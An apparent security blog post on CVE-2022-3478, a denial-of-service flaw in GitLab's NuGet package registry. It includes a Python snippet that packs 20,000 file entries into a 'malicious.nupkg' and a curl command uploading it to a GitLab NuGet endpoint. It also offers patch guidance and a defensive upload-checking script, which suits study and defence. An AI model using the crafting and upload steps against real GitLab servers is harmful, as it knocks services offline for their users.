In today’s DevOps culture, GitLab stands as a staple in CI/CD and source code management. But with exposure comes risk. In late 2022, one such risk—CVE-2022-3478—was discovered in GitLab’s handling of NuGet packages. This vulnerability allowed an attacker to crash GitLab by simply uploading a specially crafted package. If you maintain a GitLab instance, this long-read walks through the issue, shows you the technical details with code, and offers resources for further action.
What Is CVE-2022-3478?
CVE-2022-3478 is a Denial-of-Service (DoS) vulnerability discovered in GitLab’s NuGet package registry. Mismanagement of uploaded NuGet packages meant attackers could disrupt GitLab’s operations by submitting maliciously formatted files.
Affected versions: GitLab releases prior to the fixed versions below, including the 15.6 line before 15.6.1.
Fixed versions are 15.4.6, 15.5.5 and 15.6.1. You can check the official GitLab Security Release for confirmation.
The Technicality: Why NuGet?
NuGet is a Microsoft package management system for .NET, .NET Core, and Mono. GitLab supports it as a registry. But GitLab’s backend, written in Ruby, had insufficient validation; a malformed .nupkg (NuGet package) would destabilize the service.
How Does the Attack Work?
The vulnerability is triggered when GitLab parses a malicious NuGet package file. A NuGet package is just a ZIP container, so by packing it with junk, deeply nested folders, or oversized attributes, an attacker can make GitLab consume too much memory or stall in processing, eventually rendering the server unresponsive.
Craft a Malicious NuGet Package
You can use basic tooling or Python's zipfile module. The classic example is the so-called "zip bomb": a ZIP file containing many nested ZIPs, designed to expand exponentially. The snippet below takes the simpler route of packing thousands of copies of one tiny file into the archive.
```python
import zipfile

with open("tiny.txt", "w") as f:
    f.write("A" * 10)
# Create a zip with thousands of copies/nesting
with zipfile.ZipFile("malicious.nupkg", "w") as z:
    for i in range(20000):  # Arbitrary large number
        z.write("tiny.txt", f"folder{i}/tiny.txt")
```
Upload Target: GitLab NuGet Endpoint
Documentation: GitLab NuGet Registry
```shell
curl --upload-file malicious.nupkg \
  "https://gitlab.example.com/api/v4/projects//packages/nuget"
```
References
- GitLab Security Release and Advisory
- CVE Record - NVD
- GitLab NuGet Registry Docs
- Python zipfile documentation
Mitigation & Patch
- Upgrade your GitLab install: If you run any affected version, upgrade to a fixed patch release of your minor line (15.4.6+, 15.5.5+, or 15.6.1+).
- Disable NuGet Registry if you don’t need it: That can be done using project/package settings.
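Beyond patching, uploads can be vetted before the registry ever parses them. The following is an added defender-side example (not code from this post or from GitLab) that inspects a .nupkg from its ZIP central directory alone, without inflating any entry, and rejects the entry floods, deep nesting and oversized contents described above; the limits and the `inspect_nupkg`/`make_sample` names are assumptions.

```python
import io
import zipfile

# Hypothetical limits for an upload gate in front of the NuGet registry;
# these are assumptions, not GitLab's own thresholds. Tune for your instance.
MAX_ENTRIES = 5000
MAX_UNCOMPRESSED = 256 * 1024 * 1024   # total declared size after inflation
MAX_RATIO = 100                        # uncompressed : compressed
MAX_DEPTH = 16                         # path components per entry
NESTED_EXTS = (".zip", ".nupkg")

def inspect_nupkg(data: bytes) -> tuple[bool, str]:
    """Vet a .nupkg (a ZIP container) from its central directory only.
    No entry is inflated, so the check stays cheap even for a zip bomb."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return False, "not a valid ZIP container"
    infos = zf.infolist()
    if len(infos) > MAX_ENTRIES:
        return False, f"too many entries: {len(infos)}"
    total_plain = total_comp = 0
    for info in infos:
        name = info.filename
        if name.startswith("/") or ".." in name.split("/"):
            return False, f"path traversal in entry {name!r}"
        if name.count("/") >= MAX_DEPTH:
            return False, f"path nested too deep: {name!r}"
        if name.lower().endswith(NESTED_EXTS):
            return False, f"nested archive rejected: {name!r}"
        total_plain += info.file_size        # sizes come from headers, not inflation
        total_comp += info.compress_size
        if total_plain > MAX_UNCOMPRESSED:
            return False, "declared uncompressed size exceeds limit"
    if total_comp and total_plain / total_comp > MAX_RATIO:
        return False, f"suspicious compression ratio {total_plain // total_comp}:1"
    return True, "ok"

def make_sample(entries: int, depth: int = 1, payload: bytes = b"A" * 10) -> bytes:
    """Constructed test input: a ZIP holding `entries` copies of `payload`,
    each placed `depth` path components deep (mirrors the folder{i} trick)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for i in range(entries):
            z.writestr("/".join(["d"] * (depth - 1) + [f"f{i}.txt"]), payload)
    return buf.getvalue()

if __name__ == "__main__":
    print(inspect_nupkg(make_sample(10)))               # (True, 'ok')
    print(inspect_nupkg(make_sample(MAX_ENTRIES + 1)))  # (False, 'too many entries: 5001')
```

Run the gate on the raw request body before handing the file to the registry code, and log the rejection reason so floods of bad uploads show up in monitoring.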
Key Takeaways
- CVE-2022-3478 is a reminder that package management endpoints can be a hidden vector for devastating DoS attacks.
- Keeping your software up to date is the best prevention.
- Validate and monitor uploads—sometimes, secure defaults and logging are the most effective defenses.
Stay safe. Patch early. And keep an eye out for what’s lurking inside those packages!
*If you need to test for this vulnerability in your own sandbox (never attack others), make sure you have the right permissions and backups! Responsible disclosure and safe practices keep the community secure for all.*
Timeline
Published on: 01/26/2023 21:15:00 UTC
Last modified on: 02/01/2023 17:16:00 UTC